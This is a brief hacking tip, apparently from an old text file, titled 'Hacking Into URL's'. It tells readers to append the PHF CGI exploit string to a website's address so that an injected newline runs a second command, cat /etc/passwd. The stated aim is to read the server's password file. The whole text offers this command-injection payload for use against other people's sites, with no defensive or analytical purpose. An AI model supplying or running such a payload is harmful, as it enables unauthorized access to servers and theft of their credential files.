Hacking Into URL's:

After the .com, or many other variations, you can place this: /cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd . Now, if the site is vulnerable to the attack, you will get right into the password file.